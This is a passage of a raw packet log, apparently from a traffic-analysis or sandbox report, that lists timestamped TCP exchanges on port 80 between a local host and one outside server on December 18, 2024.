                                                  Dec 18, 2024 14:07:36.277527094 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.277566910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.279401064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.279452085 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.279572010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.281394958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.281449080 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.281460047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.283305883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.283361912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.283399105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.285393953 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.285448074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.285480022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.287293911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.287364006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.287367105 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.289231062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.289294004 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.289366007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.291336060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.291349888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.291400909 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.331470013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.346811056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.346862078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.346950054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.347348928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.347558022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.347609997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.347752094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.348776102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.348833084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.349020004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.350045919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.350059032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.350101948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.351353884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.351421118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.351501942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.352524042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.352595091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.352603912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.353718996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.353777885 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.353812933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.355082035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.355110884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.355139971 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.356152058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.356200933 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.356281042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.357316971 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.357388020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.357436895 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.358515978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.358560085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.358594894 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.359778881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.359821081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.359843969 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.360891104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.360949993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.360984087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.362123966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.362185001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.362282991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.363360882 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.363424063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.363426924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.364514112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.364567995 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.364624023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.365750074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.365803957 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.365947962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.366941929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.366997004 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.367023945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.368309021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.368371964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.368423939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.369437933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.369494915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.369554996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.370553970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.370606899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.370714903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.371773958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.371824980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.371895075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.373430014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.373481035 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.373509884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.374548912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.374598026 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.374624968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.375617027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.375643015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.375677109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.376657009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.376707077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.376732111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.377867937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.377914906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.377949953 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.379153967 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.379198074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.379226923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.380520105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.380568981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.380582094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.381520987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.381593943 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.381604910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.382848978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.382901907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.382914066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.383872986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.383922100 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.384232998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.385107040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.385163069 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.385324955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.386590958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.386604071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.386697054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.387520075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.387563944 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.387614012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.388720036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.388772011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.388827085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.390022993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.390075922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.390217066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.440799952 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.459976912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.460113049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.460180044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.460628986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.460678101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.460727930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.461868048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.461922884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.461976051 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.463176012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.463361979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.463423967 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.463547945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.464699030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.464756012 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.464884996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.465728045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.465781927 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.465853930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.466948986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.467005968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.467006922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.468255043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.468270063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.468310118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.469445944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.469460011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.469516993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.470645905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.470717907 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.470746994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.471808910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.471885920 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.471921921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.473166943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.473227024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.473300934 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.474251032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.474287987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.474309921 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.518937111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.539695024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.539709091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.539824963 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.540277958 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.540479898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.540546894 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.540628910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.542165995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.542179108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.542232990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.543155909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.543215036 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.543327093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.544219017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.544275045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.544275045 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.545186043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.545206070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.545253992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.546292067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.546346903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.546360016 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.547259092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.547334909 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.547359943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.548410892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.548475981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.548477888 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.549559116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.549618006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.549668074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.550808907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.550821066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.550863028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.552004099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.552061081 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.552186012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.553411007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.553427935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.553476095 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.554441929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.554511070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.554568052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.555741072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.555789948 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.555804968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.556943893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.556958914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.557009935 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.558172941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.558193922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.558235884 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.559298992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.559375048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.559528112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.560480118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.560542107 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.560609102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.561790943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.561804056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.561851978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.562973976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.563044071 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.563081026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.564263105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.564322948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.564361095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.565644026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.565664053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.565706968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.566699028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.566764116 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.566797018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.568000078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.568062067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.568114996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.569152117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.569166899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.569214106 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.570221901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.570282936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.570317030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.571434975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.571463108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.571490049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.572871923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.572884083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.572916031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.574062109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.574100971 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.574110985 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.575130939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.575167894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.575180054 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.576220989 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.576272964 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.576409101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.577456951 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.577523947 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.577528954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.578701019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.578758001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.578802109 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.580037117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.580091000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.580091953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.581152916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.581209898 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.581280947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.582314014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.582376003 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.582444906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.583524942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.583584070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.583606005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.584692001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.584741116 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.584811926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.585925102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.585964918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.585973978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.628300905 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.683268070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.683357954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.683406115 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.683579922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.683713913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.683768988 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.684580088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.684684038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.684726954 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.685444117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.685889006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.685902119 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.685935974 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.686742067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.686789036 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.686979055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.687635899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.687679052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.687731028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.688615084 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.688630104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.688662052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.689486027 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.689532042 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.689594984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.690478086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.690521955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.690582991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.691351891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.691400051 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.691533089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.692325115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.692370892 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.692389011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.693186045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.693233013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.693320990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.694123983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.694171906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.694231987 CET8049707176.113.115.178192.168.2.8
